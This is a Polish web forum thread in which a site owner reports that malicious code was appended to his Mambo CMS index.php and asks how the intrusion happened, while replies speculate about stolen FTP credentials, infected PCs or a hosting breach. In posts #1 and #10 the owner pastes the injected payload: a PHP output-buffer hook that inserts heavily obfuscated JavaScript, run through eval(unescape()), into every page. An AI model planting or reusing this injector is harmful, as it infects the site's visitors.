Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 15

Temat: wlam na serwer czy moja wina? doklejka kodu do index.php

  1. #1
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie wlam na serwer czy moja wina? doklejka kodu do index.php

    witam,

    dzisiaj calkowicie przypadkiem odkrylem ze od 8 lipca wisi zamiast mojej strony firmowej strona owszem nadal firmowa ale z doklejonym kodem na koncu...

    chcialbym ustalic zrodlo - nie tyle kto ale jak - doklejenia kodu.

    fragment kodu strony jaki zostal doklejony to:
    Kod:
    <?php
    function phpfake($buffer)
    {
      $Exp='<script language="javascript">$="%64b%3d%22%3c7 (...tutaj reszta tego kodu - wycialem zbedny fragment...)74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));document.write($);</script>';
      return (ereg_replace("</body>", "$Exp</body>", $buffer));
    }
    ?>
    do glowy by mi nie przyszlo sprawdzac gdyby nie to ze zainstalowalem sobie wczoraj avasta a dzis wlazlem na swoja strone...bum komunikat ze znalazl malware. Przejrzalem pobieznie pliki i wyglada ze tylko index.php w glownym katalogu zostal tak potraktowany.

    czy ktos jest w stanie mnie naprowadzic na zrodlo problemu?
    strona wisi na serwerze netartu (nazwa.pl) i jest na mambo pl 4.5.3

    pytanie ogolne: czy na kontach takich jakie ma netart mozna z powodu bledu w kodzie strony uzyskac prawa zapisu do pliku jesli - po sprawdzeniu - prawo zapisu ma tylko owner? osobiscie mam wrazenie ze ktos zrobil wjazd do nazwa.pl ale nie chce rzucac zadnych oskarzen dopoki nie bede pewien ze to moja czy ich wina... celuje w moją ale hmmm chce sie poradzic doswiadczonych bardziej kolegow...

  2. #2
    Avatar Ormi
    Ormi jest offline %x-%x-%x-%n
    Zarejestrowany
    Jul 2008
    Skąd
    Za twoimi plecami
    Postów
    351

    Domyślnie

    A jakim cudem miałaby to być twoja wina? Sam dokleiłeś kod i o tym nie wiesz?
    Mi to na atak wygląda. A nazwa tej zmiennej $Exp wygląda mi na skrót od exploit, a tak zmiennych raczej nikt w skryptach, które na swojej stronie zamieszcza nie nazywa

  3. #3
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie

    moja np bo gdzies zrobilem dziure w skrypcie ktoryms choc o ile pamietam to tam za duzo nie ma hmmmmm chyba nawet nic mojego autorstwa.
    w kazdym badz razie zawsze istnieje szansa ze cos popieprzylem z prawami dostepu cczy cos ale jak sprawdzilem - sa takie jak powinny byc......

    ps. atak to napewno ale którą drogą - czy przez blad w kodzie strony czy przez atak na serwer hostingowy - oczywiscie sie nie przyznaja a ja poki co nie mam jak im udowodnic ze to ich wina (jesli w ogole)

  4. #4
    Avatar elceef
    elceef jest offline Proces bezczynności
    Zarejestrowany
    Apr 2008
    Postów
    200

    Domyślnie

    Wklej na forum cały kod. Sprawdź logi serwera HTTP.

  5. #5
    Zarejestrowany
    Jul 2008
    Skąd
    PL
    Postów
    135

    Domyślnie

    Cytat Napisał sirapacz Zobacz post
    ps. atak to napewno ale którą drogą - czy przez blad w kodzie strony czy przez atak na serwer hostingowy - oczywiscie sie nie przyznaja a ja poki co nie mam jak im udowodnic ze to ich wina (jesli w ogole)
    Dopisac kod do pliku .php mozna chyba tylko bezpośrednio, czyli musiał ktos uzyskać dostęp do Twojego konta na ftp-ie, dopisać i zapisać plik z powrotem.
    Zdalnie można wstawić kod .html czy też skrypt .js do skryptów, które gdzieś zapisują (czy to w bazie, czy w pliku) bez odfiltrowania znaczników html.

    Na chwilę obecną nie znam sposobu na edycję pliku .php w podobny sposób.
    "...i stało się! Linie telefoniczne otworzyły mi bramę do świata
    upajającego jak heroina pulsująca w żyłach ćpuna! Elektronicznym
    sygnałem przekraczam wrota szukając ucieczki od codzienności,
    głupoty i niesprawiedliwości... i znajduję podobnych sobie."

  6. #6
    Zarejestrowany
    Jun 2006
    Postów
    7

    Domyślnie

    zamiast document.write($);
    daj alert($); i zobaczysz co jest ukryte pod tym zakodowanym adresem.

    a mogło to zostać umieszczone bo może masz jakiegoś wirusa na kompie ktory w momencie podłączania się do ftp dopisuje kawałek kodu do pliku ? przeskanuj dobrze komputer

  7. #7
    Zarejestrowany
    May 2007
    Skąd
    Kraków
    Postów
    371

    Domyślnie

    i zarzuc pelnym kodem jezeli mozesz

  8. #8
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    na hostingu ci dokleili reklamy...

  9. #9
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie

    nie dokleili mi reklamy na hostingu................ to komercyjny serwer.

    motyw infekcji wirusowej jest teoretycznie mozliwy - czasami cos tam sie przypaleta, ale z reguly jest av (z reguly bo nie zawsze).

    kod zrodlowy to zwykly index mambo - nic tam ciekawego nie ma
    Kod:
    <?php
    ob_start("phpfake");
    
    /**
    * @version $Id: index.php,v 1.6 2005/11/21 11:57:20 csouza Exp $
    * @package Mambo
    * @copyright (C) 2000 - 2005 Miro 
    
    International Pty Ltd
    * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
    * Mambo is Free Software
    */
    
    // fix to address the globals overwrite problem in 
    
    php versions < 4.4.1
    $protect_globals = array('_REQUEST', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER', '_ENV', 'GLOBALS', '_SESSION');
    foreach 
    
    ($protect_globals as $global) {
        if ( in_array($global , array_keys($_REQUEST)) ||
             in_array($global , array_keys($_GET))     ||
             
    
    in_array($global , array_keys($_POST))    ||
             in_array($global , array_keys($_COOKIE))  ||
             in_array($global , array_keys($_FILES))) {
           
    
     die("Invalid Request.");
        }
    }
    
    /** Set flag that this is a parent file  */
    define( '_VALID_MOS', 1 );
    
    // checks for configuration file, if none found 
    
    loads installation page
    if ( !file_exists( 'configuration.php' ) || filesize( 'configuration.php' ) < 10 ) {
    	header( 'Location: installation/index.php' 
    
    );
    	exit();
    }
    
    include_once( 'globals.php' );
    require_once( 'configuration.php' );
    
    // displays offline page
    if ( $mosConfig_offline == 1 ){
    	
    
    include( 'offline.php' );
    	exit();
    }
    
    require_once( 'includes/mambo.php' );
    if (file_exists( 'components/com_sef/sef.php' )) {
    	require_once( 
    
    'components/com_sef/sef.php' );
    } else {
    	require_once( 'includes/sef.php' );
    }
    require_once( 'includes/frontend.php' );
    
    /*
    Installation sub folder 
    
    check, removed for work with CVS*/
    if (file_exists( 'installation/index.php' )) {
    	include ('offline.php');
    	exit();
    }
    /**/
    /** retrieve some 
    
    expected url (or form) arguments */
    $option = trim( strtolower( mosGetParam( $_REQUEST, 'option' ) ) );
    $Itemid = intval( mosGetParam( $_REQUEST, 'Itemid', 
    
    null ) );
    $database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
    $database->debug( 
    
    $mosConfig_debug );
    $acl = new gacl_api();
    
    if ($option == '') {
    	if ($Itemid) {
    		$query = "SELECT id, link"
    		. "\n FROM #__menu"
    	
    
    	. "\n WHERE menutype='mainmenu'"
    		. "\n AND id = '$Itemid'"
    		. "\n AND published = '1'"
    		;
    		
    
    $database->setQuery( $query );
    	} else {
    		$query = "SELECT id, link"
    		. "\n FROM #__menu"
    		. "\n WHERE 
    
    menutype='mainmenu' AND published='1'"
    		. "\n ORDER BY parent, ordering LIMIT 1"
    		;
    		$database->setQuery( $query );
    	}
    	
    
    $menu = new mosMenu( $database );
    	if ($database->loadObject( $menu )) {
    		$Itemid = $menu->id;
    	}
    	$link = $menu->link;
    	if (($pos = 
    
    strpos( $link, '?' )) !== false) {
    		$link = substr( $link, $pos+1 ). '&Itemid='.$Itemid;
    	}
    	parse_str( $link, $temp );
    	/** this is a 
    
    patch, need to rework when globals are handled better */
    	foreach ($temp as $k=>$v) {
    		$GLOBALS[$k] = $v;
    		$_REQUEST[$k] = $v;
    	
    
    	if ($k == 'option') {
    			$option = $v;
    		}
    	}
    }
    
    /** mainframe is an API workhorse, lots of 'core' interaction routines 
    
    */
    $mainframe = new mosMainFrame( $database, $option, '.' );
    $mainframe->initSession();
    
    // checking if we can find the Itemid thru the content
    if ( $option 
    
    == 'com_content' && $Itemid === 0 ) {
    	$id = intval( mosGetParam( $_REQUEST, 'id', 0 ) );
    	$Itemid = $mainframe->getItemid( $id );
    }
    
    /** do we have a 
    
    valid Itemid yet?? */
    if ( $Itemid === 0 ) {
    	/** Nope, just use the homepage then. */
    	$query = "SELECT id"
    	. "\n FROM #__menu"
    	. "\n WHERE 
    
    menutype='mainmenu'"
    	. "\n AND published='1'"
    	. "\n ORDER BY parent, ordering"
    	. "\n LIMIT 1"
    	;
    	$database->setQuery( $query );
    	
    
    $Itemid = $database->loadResult();
    }
    
    /** patch to lessen the impact on templates */
    if ($option == 'search') {
    	$option = 'com_search';
    }
    
    // loads 
    
    english language file by default
    if ( $mosConfig_lang == '' ) {
    	$mosConfig_lang = 'english';
    }
    include_once ( 'language/'.$mosConfig_lang.'.php' 
    
    );
    
    // frontend login & logout controls
    $return = mosGetParam( $_REQUEST, 'return', NULL );
    $message = mosGetParam( $_POST, 'message', 0 );
    if ($option == 
    
    "login") {
    	$mainframe->login();
    
    	// JS Popup message
    	if ( $message ) {
    		?>
    		<script> 
    		
    		
    
    </script>
    		<?php
    	}
    
    	if ($return) {
    		mosRedirect( $return );
    	} else {
    		mosRedirect( 'index.php' );
    	}
    
    } 
    
    else if ($option == "logout") {
    	$mainframe->logout();
    
    	// JS Popup message
    	if ( $message ) {
    		?>
    		<script> 
    		
    		</script>
    		<?php
    	}
    
    	if ($return) {
    		mosRedirect( $return );
    	} else {
    		mosRedirect( 
    
    'index.php' );
    	}
    }
    
    /** get the information about the current user from the sessions table */
    $my = $mainframe->getUser();
    
    /** detect first visit */
    $mainframe->detect();
    
    $gid = intval( $my->gid );
    
    // gets template for page
    $cur_template = $mainframe->getTemplate();
    /** temp fix - this feature is 
    
    currently disabled */
    
    /** @global A places to store information from processing of the component */
    $_MOS_OPTION = array();
    
    // precapture the output of the 
    
    component
    require_once( $mosConfig_absolute_path . '/editor/editor.php' );
    
    ob_start();
    if ($path = $mainframe->getPath( 'front' )) {
    	$task = mosGetParam( 
    
    $_REQUEST, 'task', '' );
    	$ret = mosMenuCheck( $Itemid, $option, $task, $gid );
    	if ($ret) {
    		require_once( $path );
    	} else {
    		
    
    mosNotAuth();
    	}
    } else {
    	echo _NOT_EXIST;
    }
    $_MOS_OPTION['buffer'] = ob_get_contents();
    ob_end_clean();
    
    initGzip();
    
    header( 'Expires: Mon, 26 Jul 
    
    1997 05:00:00 GMT' );
    header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' );
    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Cache-Control: post-check=0, pre-check=0', false );
    header( 'Pragma: no-cache' );
    
    // loads template file
    if ( !file_exists( 'templates/'. 
    
    $cur_template .'/index.php' ) ) {
    	echo _TEMPLATE_WARN . $cur_template;
    } else {
    	require_once( 'templates/'. $cur_template .'/index.php' );
    	echo 
    
    "";
    }
    
    // displays queries performed for page
    if ($mosConfig_debug) {
    	echo $database->_ticker . ' queries executed';
    	echo '<pre>';
     	foreach 
    
    ($database->_log as $k=>$sql) {
     	    echo $k+1 . "\n" . $sql . '<hr />';
    	}
    }
    
    doGzip();
    ?>
    tak powinno byc.

  10. #10
    Zarejestrowany
    Jul 2008
    Postów
    10

    Domyślnie

    ...a to dokleili na koncu kodu ktory zacytowalem wczesniej

    Kod:
    <?php
    function phpfake($buffer)
    {
      $Exp='<script 
    
    language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27
    
    %3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;dd%3d%22iSx%2522%3c}Sx%3c
    
    tSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%25
    
    22%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;dz%3d%22%2566unc%2574%2569on%2520dw(%2574)%257bca%253d%2527%252564oc%252575m%2565n%252574.w
    
    %25257%2532i%2574%252565%2528%252522%2527;ce%253d%2527%252522)%2527;cb%253d%2527%25253csc%252572ipt%252520%256c%25256%2531ngu%252561%2567e%25253d%25255c%2525
    
    22ja%2576a%252573c%2572i%252570%252574%25255c%252522%25253e%2527;cc%253d%2527%25253c%2525%2535%2563%25252fs%2563%2572i%2570t%25253e%2527;eval%2528%2575nes%25
    
    63ape%2528t))%257d%253b%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;cc%3d%225ngt%2568;i%252b+)%257bt%256dp
    
    %253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cu%3d%22(
    
    gwf}d`4xuzsausq)6~ubugwf}d`6*}r4%3czub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2
    
    fbuf4d%7bdK`}yq%7ba`4)4#%2526$%2frazw`}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su`%7bf:w%7b%7b%257F}
    
    qQzuvxqp%3dfq`afz4}gKqzuvxqp%2f}r4%3c`mdq%7br4p%7bwayqz`:w%7b%7b%257F}q4))43g`f}zs3%3d}r4%3cp%7bwayqz`:w%7b%7b%257F}q:xqzs`|4))4$%3dop%7bwayqz`:w%7b%7b%257F}
    
    q4)46`qg`6%2f}gKqzuvxqp4)4p%7bwayqz`:w%7b%7b%257F}q4))43`qg`3%2fp%7bwayqz`:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4`faq%2fifq`afz4}gKqzuvxqp%2firazw`}%7bz4d
    
    %7bdKsq`W%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz`:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gq`G`f4)4zaxx%2fbuf4%7brrgq`4)4$%
    
    2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs`|4*4$%3do%7brrgq`4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq`45)49%25%3do%7brrgq`4?)4gqufw|:xqzs`|%2fqzp4
    
    )4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq`%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs`|%2figq`G`f4)4azqgwudq%3cw%7b%7b%257F}q:gavg`f}zs%3c%7brrgq`84
    
    qzp%3d%3d%2fiifq`afz%3cgq`G`f%3d%2firazw`}%7bz4d%7bdKgq`W%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz`:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4ql
    
    d}fqg)Rf}pum8%27%259Pqw9!$4%2526%[email protected]%2f4du`|);%2f6%2firazw`}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+pl6%2fbu
    
    f4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258`%7b%7bxvuf)%258x%7bwu`}%7bz)%258yqzavuf)%258g`u`ag)%258p}fqw`%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4`faq%2f}r4%3cp%7bway
    
    qz`:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz`:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz`:v%7bpm:%7
    
    bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%
    
    257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Pu`q%3c%3d%2fbux%25264)4zqc4Pu`q%3cbu
    
    x%3d%2fa`w%27%25264)4Pu`q:[email protected]%3cz%7bc:sq`RaxxMquf%3c%3d84z%7bc:sq`Y%7bz`|%3c%3d84z%7bc:sq`Pu`q%3c%3d84z%7bc:sq`%255C%7bafg%3c%3d84z%7bc:sq`Y}za`qg%3c%3d84z%7
    
    bc:sq`Gqw%7bzpg%3c%3d%3d%2fa`w%25264)4Pu`q:[email protected]%3cbux%2526:sq`RaxxMquf%3c%3d84bux%2526:sq`Y%7bz`|%3c%3d84bux%2526:sq`Pu`q%3c%3d84bux%2526:sq`%255C%7bafg%3c%3d
    
    84bux%2526:sq`Y}za`qg%3c%3d84bux%2526:sq`Gqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4a`w%27%2526494a`w%25264%3d4;4%25$$$4(4d%7bdK`}yq%7ba`%3e%2522$%3dozqqpK%7bdqz4)4ruxg
    
    q%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzu
    
    vxqp%3c%3d%3doz%7bc4)4zqc4Pu`q%3c%3d%2fd%7bdKgq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw`}%7bz4d%7bdK}z}`%3c%3dobuf4bqf4)4dufgqRx%7bu`%
    
    3czub}su`%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-,6%3d*)
    
    $4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%[email protected]%3d*)$4%3d22%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su`%7bf:uddZuyq45)43Zq`gwudq3
    
    %3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3YG]Q3%3d4*49%25%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3GB%253%3d4*49%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%
    
    3do}r4%3cp%7bwayqz`:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz`:x}z%257Fg:xqzs`|%2f4}??%3do}r4%3cp%7bwayqz`:x}z%257FgO}I:`ufsq`45)46Kvxuz%257F6%3dop%7bwayq
    
    z`:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz`:%7bzwx}w
    
    %257FKw%7bdm4)4p%7bwayqz`:%7bzwx}w%257F%2fp%7bwayqz`:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}`%3c%3d%2fi(;gwf}d`*%22;de%3d%22M+}Sx-|)K88d)K7}7M;}^}950%2522%
    
    259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!
    
    ;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx
    
    89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cz%3d%22%2566u%256ec%2574i%256fn 
    
    %2563z%2528%2563%257a)%257bret%2575rn%2520c%2561%252b%2563%2562%252bc%2563+%2563%2564+c%2565+c%257a;}%253b%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu
    
    7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3
    
    c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;c
    
    e%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;op%3d%22%2524%253d%2522dw(d%2563%2573(cu%252c14)%2529;%2522;%22;st%3d%
    
    22%2573t%253d%2522$%253ds%2574%253b%2564c%2573%2528%2564a%252b%2564%2562%252b%2564%2563+%2564%2564%252b%2564e%252c1%2530%2529;%2564w%2528%2573t%2529%253bs%25
    
    74%253d%2524;%2522;%22;%69f 
    
    %28d%6fc%75me%6et.%63ook%69%65%2eind%65%78%4f%66(%27%76%62ull%65%74%69%6e%5f%6dult%69qu%6f%74%65%3d%27)%3d%3d-1)%7bsc(%27vbulle%74%69%6e_%6dul%74iq%75ote%3d%
    
    27,2,7%29;e%76a%6c%28u%6ee%73ca%70e%28dz+%63%7a+op%2bs%74)+%27dw%28dz%2bcz%28$+s%74))%3b%27)}e%6cse%7b$%3d%27%27};function%20s%63(c%6em,%76,e%64)%7bv%61r 
    
    e%78d%3dnew D%61t%65();%65xd.%73%65%74D%61%74e(%65xd.%67e%74Da%74e(%29+%65d);%64oc%75men%74%2ecoo%6bie%3dc%6em%2b %27%3d%27 
    
    +%65sc%61%70%65(v%29+%27;e%78p%69%72es%3d%27+e%78d.%74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));alert($);</script>';
      return (ereg_replace("</body>", 
    
    "$Exp</body>", $buffer));
    }
    ?>

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. [pHp] == czy ===
    By gogulas in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 3
    Autor: 04-27-2008, 13:23
  2. Serwer bierze XML za PHP, co zrobić by tego uniknąć?
    By Nikow in forum HTML/DHTML/XHTML
    Odpowiedzi: 5
    Autor: 02-17-2008, 00:21
  3. Serwer www z PHP
    By gogulas in forum PHP/CGI/ASP/JSP/J2EE
    Odpowiedzi: 14
    Autor: 12-13-2007, 08:31
  4. Odpowiedzi: 2
    Autor: 10-14-2007, 09:26
  5. Sql Injection na index.php
    By Fint in forum Hacking
    Odpowiedzi: 7
    Autor: 06-20-2007, 09:10

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52